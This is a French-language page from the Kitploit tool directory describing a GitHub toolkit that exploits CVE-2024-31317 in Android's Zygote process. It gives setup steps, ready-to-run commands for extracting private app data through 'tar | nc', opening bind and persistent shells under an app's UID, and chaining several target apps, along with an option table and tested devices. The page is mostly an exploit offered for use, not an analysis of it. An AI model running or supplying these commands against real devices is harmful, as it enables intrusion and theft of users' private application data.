Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
zygote-CVE-2024-31317 — Ceci est un kit d'outils qui utilise CVE-2024-31317 pour extraire des données privées d'applications via ADB ou générer un shell avec l'UID d'une application. | Kitploit
Outils/GitHubGitHub/vnescape/zygote-cve-2024-31317
Sécurité AndroidAnalyse des VulnérabilitésExploitationExfiltration de DonnéesTests d'IntrusionSécurité Mobile
GitHubvnescape/zygote-cve-2024-31317

zygote-CVE-2024-31317

Ceci est un kit d'outils qui utilise CVE-2024-31317 pour extraire des données privées d'applications via ADB ou générer un shell avec l'UID d'une application.

Voir le dépôt
312il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Zygote Toolkit - CVE-2024-31317

Ce kit utilise CVE-2024-31317 pour extraire les données privées des applications via ADB ou lancer un shell avec l'UID d'une application. Cette vulnérabilité affecte les versions Android 9 à 14 avec un niveau de correctif de sécurité au 2024-06-01 ou antérieur. Une matrice de support des appareils testés se trouve ci-dessous.

Prérequis

Debian/Ubuntu (paquets système)

root@kitploit:~
sudo apt update
sudo apt install adb openjdk-17-jdk-headless android-sdk android-sdk-build-tools
export ANDROID_HOME=/usr/lib/android-sdk
export PATH=$PATH:$ANDROID_HOME/build-tools/34.0.0:$ANDROID_HOME/platform-tools

Ajoutez les lignes export à ~/.bashrc (ou équivalent) pour une persistance.

Vérification

root@kitploit:~
./setup.sh

Démarrage rapide

root@kitploit:~
# Construction et installation de l'APK carrier (auto-construction depuis les sources)
python3 cve_2024_31317.py com.google.android.youtube --setup --rebuild -y

# Extraction du répertoire de données d'une application
python3 cve_2024_31317.py -d NUMERO_APPAREIL -E -o app_data.tar -y com.example.app

L'exploit construit tout à partir de Hijack.java et AndroidManifest.xml au premier lancement.

Utilisation

root@kitploit:~
python3 cve_2024_31317.py [flags] [package]

Modes

Options

Exemples

root@kitploit:~
# Extraction
python3 cve_2024_31317.py -d APPAREIL -E -o youtube.tar -y com.google.android.youtube

# Vérifier si l'appareil est vulnérable
python3 cve_2024_31317.py -d APPAREIL --check-vuln

# Shell interactif bind
python3 cve_2024_31317.py -d APPAREIL -i -y com.google.android.youtube

# Shell persistant sur le port 7777
python3 cve_2024_31317.py -d APPAREIL -S 7777 -y com.google.android.youtube

# Chaîne multi-applications
python3 cve_2024_31317.py -d APPAREIL -E -y --chain-targets "app1,app2,app3"

# Récupération uniquement (corriger boucle de démarrage)
python3 cve_2024_31317.py -d APPAREIL --recover

Construction à partir des sources

Tout se construit à partir des sources à l'exécution. La chaîne de construction utilise javac (JDK 17+), d8, aapt, zipalign et apksigner du SDK Android.

  • x86_64 → arm64 : les outils s'exécutent nativement ; la sortie DEX est indépendante de l'architecture
  • ARM64 → arm64 : tout s'exécute nativement (Adoptium fournit des builds JDK pour ARM64)

Code de verrouillage

Si l'appareil a un code de verrouillage, il démarre en BFU (Before First Unlock). L'exploit interroge sys.user.0.ce_available pendant jusqu'à 5 minutes jusqu'à ce que vous déverrouilliez. Il est recommandé de supprimer le code de verrouillage pendant la durée de l'exploit.

Appareils testés

† Spécifique à Samsung One UI : l'injection de ZNJECT réussit et l'extraction -E fonctionne, mais le shell bind toybox nc ServerSocket ne s'ouvre jamais. Nécessite des recherches supplémentaires pour trouver la cause racine du problème.

Récupération

La charge utile reste dans hidden_api_blacklist_exemptions peut provoquer une boucle de démarrage au prochain redémarrage. Exécutez --recover pour réinitialiser :

root@kitploit:~
python3 cve_2024_31317.py -d APPAREIL --recover
Télécharger l’outil
OptionDescription
-EExtraire les données de l'application via grandchild tar | nc (survit à la destruction du parent)
-iShell interactif bind (REPL)
-S PORTShell persistant (protocole FIFO à port unique)
--recoverRéinitialiser le paramètre, corriger le blocage au démarrage / la dégradation de Zygote
--setupConstruire + installer l'APK carrier uniquement (pas d'injection)
--list-appsLister tous les paquets installés avec UID et type sys/user
--check-vulnVérifier si l'appareil est vulnérable à CVE-2024-31317 puis quitter
OptionDescription
-o fichier.tarChemin de sortie pour l'archive d'extraction
-y / --yesIgnorer les invites de confirmation
--retries NNombre maximum de tentatives par cible (défaut 3)
--chain-targets "pkg1,pkg2"Extraire plusieurs applications en une session
--chain-file fichier.jsonIdentique à ci-dessus, depuis un fichier JSON
--reboot-afterRedémarrer après extraction (restaure Zygote)
--reboot-every NRedémarrer après chaque N cibles de la chaîne
--coldIgnorer le préchauffage ; stocker la charge utile pour le prochain lancement d'application
--port PORTPort du shell bind (défaut 8888)
-d SERIALCibler un appareil spécifique (plusieurs connectés)
--rebuildForcer la reconstruction de l'APK carrier
AppareilAndroidAPICorrectifABI-E-i-S--chain--cold--retries--recover--reboot-after--list-apps--check-vulnScore
Google Pixel 312312021-10-05arm64-v8a✅✅✅✅✅✅✅✅✅✅12/12
Samsung SM-P615 Tab S6 Lite13332024-05-01arm64-v8a✅❌†❌†✅✅❌†✅✅✅✅9/12
sdk_gphone_x86_64 (émulateur)10292019-09-05x86_64✅✅✅✅✅✅✅✅✅✅12/12